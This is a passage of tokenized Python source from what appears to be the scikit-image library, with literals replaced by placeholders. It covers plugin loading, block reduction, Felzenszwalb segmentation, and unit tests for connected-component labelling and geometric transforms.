== '<STR_LIT>' : <EOL> kind = [ kind , '<STR_LIT>' ] <EOL> else : <EOL> kind = [ kind ] <EOL> _load ( name ) <EOL> for k in kind : <EOL> if not k in plugin_store : <EOL> raise RuntimeError ( "<STR_LIT>" % k ) <EOL> funcs = plugin_store [ k ] <EOL> funcs = [ ( n , f ) for ( n , f ) in funcs if n == name ] + [ ( n , f ) for ( n , f ) in funcs if n != name ] <EOL> plugin_store [ k ] = funcs <EOL> def _inject_imread_collection_if_needed ( module ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( module , '<STR_LIT>' ) and hasattr ( module , '<STR_LIT>' ) : <EOL> imread = getattr ( module , '<STR_LIT>' ) <EOL> func = imread_collection_wrapper ( imread ) <EOL> setattr ( module , '<STR_LIT>' , func ) <EOL> def _load ( plugin ) : <EOL> """<STR_LIT>""" <EOL> if plugin in find_available_plugins ( loaded = True ) : <EOL> return <EOL> if not plugin in plugin_module_name : <EOL> 
raise ValueError ( "<STR_LIT>" % plugin ) <EOL> else : <EOL> modname = plugin_module_name [ plugin ] <EOL> plugin_module = __import__ ( '<STR_LIT>' + modname , <EOL> fromlist = [ modname ] ) <EOL> provides = plugin_provides [ plugin ] <EOL> for p in provides : <EOL> if p == '<STR_LIT>' : <EOL> _inject_imread_collection_if_needed ( plugin_module ) <EOL> elif not hasattr ( plugin_module , p ) : <EOL> print ( "<STR_LIT>" % <EOL> ( plugin , p ) ) <EOL> continue <EOL> store = plugin_store [ p ] <EOL> func = getattr ( plugin_module , p ) <EOL> if not ( plugin , func ) in store : <EOL> store . append ( ( plugin , func ) ) <EOL> def plugin_info ( plugin ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return plugin_meta_data [ plugin ] <EOL> except KeyError : <EOL> raise ValueError ( '<STR_LIT>' % plugin ) <EOL> def plugin_order ( ) : <EOL> """<STR_LIT>""" <EOL> p = { } <EOL> for func in plugin_store : <EOL> p [ func ] = [ plugin_name for ( plugin_name , f ) in plugin_store [ func ] ] <EOL> return p </s>
<s> import numpy as np <EOL> from . . util import view_as_blocks , pad <EOL> def block_reduce ( image , block_size , func = np . sum , cval = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> if len ( block_size ) != image . ndim : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> pad_width = [ ] <EOL> for i in range ( len ( block_size ) ) : <EOL> if block_size [ i ] < <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if image . shape [ i ] % block_size [ i ] != <NUM_LIT:0> : <EOL> after_width = block_size [ i ] - ( image . shape [ i ] % block_size [ i ] ) <EOL> else : <EOL> after_width = <NUM_LIT:0> <EOL> pad_width . append ( ( <NUM_LIT:0> , after_width ) ) <EOL> image = pad ( image , pad_width = pad_width , mode = '<STR_LIT>' , <EOL> constant_values = cval ) <EOL> out = view_as_blocks ( image , block_size ) <EOL> for i in range ( len ( out . shape ) // <NUM_LIT:2> ) : <EOL> out = func ( out , axis = - <NUM_LIT:1> ) <EOL> return out </s>
<s> import numpy as np <EOL> from numpy . testing import assert_array_equal , run_module_suite <EOL> from skimage . measure import label <EOL> import skimage . measure . _ccomp as ccomp <EOL> from skimage . _shared . _warnings import expected_warnings <EOL> BG = <NUM_LIT:0> <EOL> class TestConnectedComponents : <EOL> def setup ( self ) : <EOL> self . x = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:9> , <NUM_LIT:2> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:3> , <NUM_LIT:0> ] ] ) <EOL> self . labels = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:0> ] ] ) <EOL> def test_basic ( self ) : <EOL> assert_array_equal ( label ( self . x ) , self . labels ) <EOL> assert self . x [ <NUM_LIT:0> , <NUM_LIT:2> ] == <NUM_LIT:3> <EOL> def test_random ( self ) : <EOL> x = ( np . random . rand ( <NUM_LIT:20> , <NUM_LIT:30> ) * <NUM_LIT:5> ) . astype ( np . int ) <EOL> labels = label ( x ) <EOL> n = labels . max ( ) <EOL> for i in range ( n ) : <EOL> values = x [ labels == i ] <EOL> assert np . all ( values == values [ <NUM_LIT:0> ] ) <EOL> def test_diag ( self ) : <EOL> x = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> assert_array_equal ( label ( x ) , x ) <EOL> def test_4_vs_8 ( self ) : <EOL> x = np . 
array ( [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , dtype = int ) <EOL> assert_array_equal ( label ( x , <NUM_LIT:4> ) , <EOL> [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:0> ] ] ) <EOL> assert_array_equal ( label ( x , <NUM_LIT:8> ) , <EOL> [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> ] ] ) <EOL> def test_background ( self ) : <EOL> x = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> assert_array_equal ( label ( x ) , [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> assert_array_equal ( label ( x , background = <NUM_LIT:0> ) , <EOL> [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> def test_background_two_regions ( self ) : <EOL> x = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> ] ] ) <EOL> res = label ( x , background = <NUM_LIT:0> ) <EOL> assert_array_equal ( res , <EOL> [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ] ] ) <EOL> def test_background_one_region_center ( self ) : <EOL> x = np . 
array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> assert_array_equal ( label ( x , neighbors = <NUM_LIT:4> , background = <NUM_LIT:0> ) , <EOL> [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> def test_return_num ( self ) : <EOL> x = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> ] ] ) <EOL> assert_array_equal ( label ( x , return_num = True ) [ <NUM_LIT:1> ] , <NUM_LIT:3> ) <EOL> assert_array_equal ( label ( x , background = - <NUM_LIT:1> , return_num = True ) [ <NUM_LIT:1> ] , <NUM_LIT:4> ) <EOL> class TestConnectedComponents3d : <EOL> def setup ( self ) : <EOL> self . x = np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) , int ) <EOL> self . x [ <NUM_LIT:0> ] = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:9> , <NUM_LIT:2> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:3> , <NUM_LIT:0> ] ] ) <EOL> self . x [ <NUM_LIT:1> ] = np . array ( [ [ <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:9> , <NUM_LIT:2> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:0> ] ] ) <EOL> self . x [ <NUM_LIT:2> ] = np . 
array ( [ [ <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:8> , <NUM_LIT:8> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:9> , <NUM_LIT:8> , <NUM_LIT:8> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:8> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> self . labels = np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) , int ) <EOL> self . labels [ <NUM_LIT:0> ] = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:1> , <NUM_LIT:0> ] ] ) <EOL> self . labels [ <NUM_LIT:1> ] = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ] ] ) <EOL> self . labels [ <NUM_LIT:2> ] = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:7> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:8> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:7> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:8> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:7> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:8> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> def test_basic ( self ) : <EOL> labels = label ( self . x ) <EOL> assert_array_equal ( labels , self . labels ) <EOL> assert self . x [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> ] == <NUM_LIT:2> , "<STR_LIT>" <EOL> def test_random ( self ) : <EOL> x = ( np . random . rand ( <NUM_LIT:20> , <NUM_LIT:30> ) * <NUM_LIT:5> ) . astype ( np . int ) <EOL> labels = label ( x ) <EOL> n = labels . 
max ( ) <EOL> for i in range ( n ) : <EOL> values = x [ labels == i ] <EOL> assert np . all ( values == values [ <NUM_LIT:0> ] ) <EOL> def test_diag ( self ) : <EOL> x = np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> ) , int ) <EOL> x [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:2> ] = <NUM_LIT:1> <EOL> x [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> x [ <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> assert_array_equal ( label ( x ) , x ) <EOL> def test_4_vs_8 ( self ) : <EOL> x = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ) , int ) <EOL> x [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> x [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> label4 = x . copy ( ) <EOL> label4 [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] = <NUM_LIT:2> <EOL> assert_array_equal ( label ( x , <NUM_LIT:4> ) , label4 ) <EOL> assert_array_equal ( label ( x , <NUM_LIT:8> ) , x ) <EOL> def test_background ( self ) : <EOL> x = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> ) , int ) <EOL> x [ <NUM_LIT:0> ] = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> x [ <NUM_LIT:1> ] = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> lnb = x . copy ( ) <EOL> lnb [ <NUM_LIT:0> ] = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ] ] ) <EOL> lnb [ <NUM_LIT:1> ] = np . array ( [ [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ] ] ) <EOL> lb = x . copy ( ) <EOL> lb [ <NUM_LIT:0> ] = np . 
array ( [ [ <NUM_LIT:1> , BG , BG ] , <EOL> [ <NUM_LIT:1> , BG , BG ] , <EOL> [ BG , BG , BG ] ] ) <EOL> lb [ <NUM_LIT:1> ] = np . array ( [ [ BG , BG , BG ] , <EOL> [ BG , <NUM_LIT:1> , <NUM_LIT:2> ] , <EOL> [ BG , BG , BG ] ] ) <EOL> assert_array_equal ( label ( x ) , lb ) <EOL> assert_array_equal ( label ( x , background = - <NUM_LIT:1> ) , lnb ) <EOL> def test_background_two_regions ( self ) : <EOL> x = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> ) , int ) <EOL> x [ <NUM_LIT:0> ] = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> ] ] ) <EOL> x [ <NUM_LIT:1> ] = np . array ( [ [ <NUM_LIT:6> , <NUM_LIT:6> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> lb = x . copy ( ) <EOL> lb [ <NUM_LIT:0> ] = np . array ( [ [ BG , BG , <NUM_LIT:1> ] , <EOL> [ BG , BG , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ] ] ) <EOL> lb [ <NUM_LIT:1> ] = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> , BG ] , <EOL> [ <NUM_LIT:2> , BG , BG ] , <EOL> [ BG , BG , BG ] ] ) <EOL> res = label ( x , background = <NUM_LIT:0> ) <EOL> assert_array_equal ( res , lb ) <EOL> def test_background_one_region_center ( self ) : <EOL> x = np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> ) , int ) <EOL> x [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> lb = np . ones_like ( x ) * BG <EOL> lb [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> assert_array_equal ( label ( x , neighbors = <NUM_LIT:4> , background = <NUM_LIT:0> ) , lb ) <EOL> def test_return_num ( self ) : <EOL> x = np . 
array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> ] ] ) <EOL> assert_array_equal ( label ( x , return_num = True ) [ <NUM_LIT:1> ] , <NUM_LIT:3> ) <EOL> assert_array_equal ( label ( x , background = - <NUM_LIT:1> , return_num = True ) [ <NUM_LIT:1> ] , <NUM_LIT:4> ) <EOL> def test_1D ( self ) : <EOL> x = np . array ( ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> xlen = len ( x ) <EOL> y = np . array ( ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> reshapes = ( ( xlen , ) , <EOL> ( <NUM_LIT:1> , xlen ) , ( xlen , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:1> , xlen , <NUM_LIT:1> ) , ( xlen , <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> , xlen ) ) <EOL> for reshape in reshapes : <EOL> x2 = x . reshape ( reshape ) <EOL> labelled = label ( x2 ) <EOL> assert_array_equal ( y , labelled . flatten ( ) ) <EOL> def test_nd ( self ) : <EOL> x = np . ones ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> np . testing . assert_raises ( NotImplementedError , label , x ) <EOL> class TestSupport : <EOL> def test_reshape ( self ) : <EOL> shapes_in = ( ( <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> ) , ( <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:2> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , ) ) <EOL> for shape in shapes_in : <EOL> shape = np . array ( shape ) <EOL> numones = sum ( shape == <NUM_LIT:1> ) <EOL> inp = np . random . random ( shape ) <EOL> fixed , swaps = ccomp . reshape_array ( inp ) <EOL> shape2 = fixed . shape <EOL> for i in range ( numones ) : <EOL> assert shape2 [ i ] == <NUM_LIT:1> <EOL> back = ccomp . 
undo_reshape_array ( fixed , swaps ) <EOL> assert_array_equal ( inp , back ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run_module_suite ( ) </s>
<s> import numpy as np <EOL> from . . _shared . utils import warn <EOL> from . _felzenszwalb_cy import _felzenszwalb_grey <EOL> def felzenszwalb ( image , scale = <NUM_LIT:1> , sigma = <NUM_LIT> , min_size = <NUM_LIT:20> ) : <EOL> """<STR_LIT>""" <EOL> if image . ndim == <NUM_LIT:2> : <EOL> return _felzenszwalb_grey ( image , scale = scale , sigma = sigma , <EOL> min_size = min_size ) <EOL> elif image . ndim != <NUM_LIT:3> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % image . ndim ) <EOL> n_channels = image . shape [ <NUM_LIT:2> ] <EOL> if n_channels != <NUM_LIT:3> : <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" % image . shape [ <NUM_LIT:2> ] ) <EOL> segmentations = [ ] <EOL> for c in range ( n_channels ) : <EOL> channel = np . ascontiguousarray ( image [ : , : , c ] ) <EOL> s = _felzenszwalb_grey ( channel , scale = scale , sigma = sigma , <EOL> min_size = min_size ) <EOL> segmentations . append ( s ) <EOL> n0 = segmentations [ <NUM_LIT:0> ] . max ( ) + <NUM_LIT:1> <EOL> n1 = segmentations [ <NUM_LIT:1> ] . max ( ) + <NUM_LIT:1> <EOL> segmentation = ( segmentations [ <NUM_LIT:0> ] + segmentations [ <NUM_LIT:1> ] * n0 <EOL> + segmentations [ <NUM_LIT:2> ] * n0 * n1 ) <EOL> labels = np . unique ( segmentation , return_inverse = True ) [ <NUM_LIT:1> ] <EOL> return labels . reshape ( image . shape [ : <NUM_LIT:2> ] ) </s>
<s> import numpy as np <EOL> from numpy . testing import ( assert_equal , assert_almost_equal , <EOL> assert_raises ) <EOL> from skimage . transform . _geometric import _stackcopy <EOL> from skimage . transform . _geometric import GeometricTransform <EOL> from skimage . transform import ( estimate_transform , matrix_transform , <EOL> SimilarityTransform , AffineTransform , <EOL> ProjectiveTransform , PolynomialTransform , <EOL> PiecewiseAffineTransform ) <EOL> from skimage . _shared . _warnings import expected_warnings <EOL> SRC = np . array ( [ <EOL> [ - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , - <NUM_LIT> ] , <EOL> ] ) <EOL> DST = np . array ( [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , <EOL> ] ) <EOL> def test_stackcopy ( ) : <EOL> layers = <NUM_LIT:4> <EOL> x = np . empty ( ( <NUM_LIT:3> , <NUM_LIT:3> , layers ) ) <EOL> y = np . eye ( <NUM_LIT:3> , <NUM_LIT:3> ) <EOL> _stackcopy ( x , y ) <EOL> for i in range ( layers ) : <EOL> assert_almost_equal ( x [ ... , i ] , y ) <EOL> def test_estimate_transform ( ) : <EOL> for tform in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> estimate_transform ( tform , SRC [ : <NUM_LIT:2> , : ] , DST [ : <NUM_LIT:2> , : ] ) <EOL> assert_raises ( ValueError , estimate_transform , '<STR_LIT>' , <EOL> SRC [ : <NUM_LIT:2> , : ] , DST [ : <NUM_LIT:2> , : ] ) <EOL> def test_matrix_transform ( ) : <EOL> tform = AffineTransform ( scale = ( <NUM_LIT:0.1> , <NUM_LIT:0.5> ) , rotation = <NUM_LIT:2> ) <EOL> assert_equal ( tform ( SRC ) , matrix_transform ( SRC , tform . 
params ) ) <EOL> def test_similarity_estimation ( ) : <EOL> tform = estimate_transform ( '<STR_LIT>' , SRC [ : <NUM_LIT:2> , : ] , DST [ : <NUM_LIT:2> , : ] ) <EOL> assert_almost_equal ( tform ( SRC [ : <NUM_LIT:2> , : ] ) , DST [ : <NUM_LIT:2> , : ] ) <EOL> assert_equal ( tform . params [ <NUM_LIT:0> , <NUM_LIT:0> ] , tform . params [ <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> assert_equal ( tform . params [ <NUM_LIT:0> , <NUM_LIT:1> ] , - tform . params [ <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> tform2 = estimate_transform ( '<STR_LIT>' , SRC , DST ) <EOL> assert_almost_equal ( tform2 . inverse ( tform2 ( SRC ) ) , SRC ) <EOL> assert_equal ( tform2 . params [ <NUM_LIT:0> , <NUM_LIT:0> ] , tform2 . params [ <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> assert_equal ( tform2 . params [ <NUM_LIT:0> , <NUM_LIT:1> ] , - tform2 . params [ <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> tform3 = SimilarityTransform ( ) <EOL> tform3 . estimate ( SRC , DST ) <EOL> assert_almost_equal ( tform3 . params , tform2 . params ) <EOL> def test_similarity_init ( ) : <EOL> scale = <NUM_LIT:0.1> <EOL> rotation = <NUM_LIT:1> <EOL> translation = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> tform = SimilarityTransform ( scale = scale , rotation = rotation , <EOL> translation = translation ) <EOL> assert_almost_equal ( tform . scale , scale ) <EOL> assert_almost_equal ( tform . rotation , rotation ) <EOL> assert_almost_equal ( tform . translation , translation ) <EOL> tform2 = SimilarityTransform ( tform . params ) <EOL> assert_almost_equal ( tform2 . scale , scale ) <EOL> assert_almost_equal ( tform2 . rotation , rotation ) <EOL> assert_almost_equal ( tform2 . translation , translation ) <EOL> scale = <NUM_LIT:0.1> <EOL> rotation = <NUM_LIT:0> <EOL> translation = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> tform = SimilarityTransform ( scale = scale , rotation = rotation , <EOL> translation = translation ) <EOL> assert_almost_equal ( tform . scale , scale ) <EOL> assert_almost_equal ( tform . 
rotation , rotation ) <EOL> assert_almost_equal ( tform . translation , translation ) <EOL> scale = <NUM_LIT:0.1> <EOL> rotation = np . pi / <NUM_LIT:2> <EOL> translation = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> tform = SimilarityTransform ( scale = scale , rotation = rotation , <EOL> translation = translation ) <EOL> assert_almost_equal ( tform . scale , scale ) <EOL> assert_almost_equal ( tform . rotation , rotation ) <EOL> assert_almost_equal ( tform . translation , translation ) <EOL> def test_affine_estimation ( ) : <EOL> tform = estimate_transform ( '<STR_LIT>' , SRC [ : <NUM_LIT:3> , : ] , DST [ : <NUM_LIT:3> , : ] ) <EOL> assert_almost_equal ( tform ( SRC [ : <NUM_LIT:3> , : ] ) , DST [ : <NUM_LIT:3> , : ] ) <EOL> tform2 = estimate_transform ( '<STR_LIT>' , SRC , DST ) <EOL> assert_almost_equal ( tform2 . inverse ( tform2 ( SRC ) ) , SRC ) <EOL> tform3 = AffineTransform ( ) <EOL> tform3 . estimate ( SRC , DST ) <EOL> assert_almost_equal ( tform3 . params , tform2 . params ) <EOL> def test_affine_init ( ) : <EOL> scale = ( <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> rotation = <NUM_LIT:1> <EOL> shear = <NUM_LIT:0.1> <EOL> translation = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> tform = AffineTransform ( scale = scale , rotation = rotation , shear = shear , <EOL> translation = translation ) <EOL> assert_almost_equal ( tform . scale , scale ) <EOL> assert_almost_equal ( tform . rotation , rotation ) <EOL> assert_almost_equal ( tform . shear , shear ) <EOL> assert_almost_equal ( tform . translation , translation ) <EOL> tform2 = AffineTransform ( tform . params ) <EOL> assert_almost_equal ( tform2 . scale 